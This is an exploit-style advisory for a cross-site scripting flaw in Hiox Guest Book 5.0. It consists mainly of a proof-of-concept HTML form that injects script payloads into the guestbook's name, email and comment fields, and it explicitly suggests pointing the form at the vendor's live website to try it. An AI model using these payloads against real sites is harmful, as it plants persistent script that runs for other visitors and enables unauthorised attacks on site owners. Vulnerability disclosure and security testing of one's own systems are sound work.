Hiox Guest Book version 5.0 suffers from a cross site scripting vulnerability.
7d3cf1111c33a481e8bf5055f4fb2f89af8fa2389636226574df3f4d7f5ba67a
#############################################################################
# Exploit Title : HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting
# Author : JoKeR_StEx
# Tested On : Windows
# Download Software Link : www.hscripts.com/scripts/php/downloads/HGB.zip
# Date : 03/01/2014
#############################################################################
[+] P.O.C
<form action="http://127.0.0.1/HGB/add.php" method="POST">
<!--In Name -->
<input type="hidden" name="name1" value=""><script>prompt('JoKeR_StEx')</script>">
<!-- In Email -->
<input type="hidden" name="email" value=""><script>prompt('xss (email)')</script>">
<!-- in comment -->
<input type="hidden" name="cmt" value=""><script>prompt('xss (comment)')</script>">
</form>
[+] To test the exploit (example)
ex: http://www.hscripts.com/scripts/php/HGB/add.php
Just replace http://127.0.0.1/HGB/add.php with http://www.hscripts.com/scripts/php/HGB/add.php ^___^
################################################################################
# Gr33t'z To : Asesino04 , Shield Dz , & All My Friends & All Algerians
################################################################################
email : jokerdz44@yahoo.fr
Facebook : fb.me/imadlilong.lasvegas
twitter : @JoKeR_StEx